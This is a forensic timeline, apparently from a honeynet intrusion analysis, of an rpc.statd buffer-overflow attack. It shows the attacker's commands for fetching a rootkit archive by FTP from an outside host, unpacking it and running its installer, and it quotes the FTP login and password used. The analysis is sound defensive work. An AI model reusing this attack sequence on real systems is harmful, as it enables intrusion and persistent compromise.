Timeline of the events took place, as recorded in the snort-0315@0005.log
| Time (hh:mm:ss) | Event |
| 20:21:23 | the host 211.185.125.124 performed a SYN scan on TCP port 111 of all hosts in this honeynet, and both 172.16.1.103 and 172.16.1.108 responded with a SYN-ACK |
| 20:21:24 | the host 211.185.125.124 sent a "RPC GETPORT Call" query to the host 172.16.1.103. |
| the host 172.16.1.103 replied with a "RPC GETPORT Reply" packet to the host 211.185.125.124 indicating its rpc.statd is listening on UDP port 32773. | |
| the host 211.185.125.124 sent a malformed STAT request to UDP port 32773 of the host 172.16.1.103 | |
| the host 172.16.1.103 replied to the STAT request sent by the host 211.185.125.124 and stated the request failed. | |
| 20:21:25 | the host 211.185.125.124 send a "RPC GETPORT Call" query to the host 172.16.1.108. |
| the host 172.16.1.108 replied to the "RPC GETPORT Call" with a "RPC GETPORT Reply", telling the host 211.185.125.124 that its RPC port is listening on UDP port 931. | |
| the host 211.185.125.124 sent a malformed STAT request to port 931 of the host 172.16.1.108 attempting to buffer-overflow rpc.statd. | |
| 20:21:26 | the host 211.185.125.124 performed yet another SYN scan on TCP port 111, but this time, only those hosts that didn't respond previously were scanned. |
| 20:2127 | the host 211.185.125.124 sent yet another mal-formed STAT request to port 931 of the host 172.16.1.108 attempting to buffer-overflow rpc.statd. |
| 20:21:29 | the host 211.185.125.124 sent yet another mal-formed STAT request to port 931 of the host 172.16.1.108 attempting to buffer-overflow rpc.statd. |
| 20:21:32 | the host 211.185.125.124 performed an identical SYN scan as one launched at 20:21:26 |
| 20:21:36 | this is when the cracker launched the actual TCP connection to port 39168 and executed the command "cd /; uname -a; id;". |
| 20:36:04 | the cracker executed the command "ftp -v ftp.home.ro". |
| 20:36:05 | ftp.home.ro performed an ident request to get list of who's currently logged on the host 172.16.1.108 |
| 20:36:07 | ftp.home.ro performed another ident request to get list of who's currently logged on the host 172.16.1.108 |
| 20:36:08 | ftp.home.ro prompted the cracker for user name for the FTP connection. |
| 20:36:12 | the cracker entered the user name "soane" as the login name for the FTP connection. |
| ftp.home.ro prompt the cracker for the password to the user name "soane". | |
| 20:36:16 | the cracker entered the password "i2ttgcj1d". |
| 20:36:20 | the cracker executed the command "get lk.tgz". |
| 20:36:21 | ftp.home.ro acknowledge the command was entered successfully and initiated the download of the file lk.tgz. |
| 20:36:57 | the transfer of the file lk.tgz was completed. |
| 20:40:55 | the FTP connection to ftp.home.ro was terminated by ftp.home.ro since it has been idled for more than 240 seconds. |
| 20:44:51 | the cracker exits the FTP client application by executing the command "bye". |
| 20:44:59 | the cracker executed the command "tar -z xvf lk.tgz" |
| 20:45:00 | the extraction of the lk.tgz completed. |
| 20:45:08 | the cracker executed the command "cd last". |
| 20:45:11 | the cracker executed the command "./install" |
| 20:45:14 | the installation script completed |
| 20:45:18 | the cracker terminates its connection to the host 172.16.1.108. |
| 20:46:15 | the host 172.16.1.108 initiates a SMTP connection to mta502.mail.yahoo.com to deliver the mail message for bidi_damm@yahoo.com. |
| 20:46:16 | the said SMTP mail delivery was completed and the SMTP connection terminated. The transcript of this delivery is attached. |
| 20:46:24 | the host 172.16.1.108 initiates a SMTP connection to spf2.us3.outblaze.com to deliver the mail message for last@linuxmail.org |
| 20:46:25 | the said SMTP mail delivery was aborted by the receiving host as it complained about the domain asdf1 (from the sender's email address root@asdf1) does not exist. The transcript of this delivery is also attached. |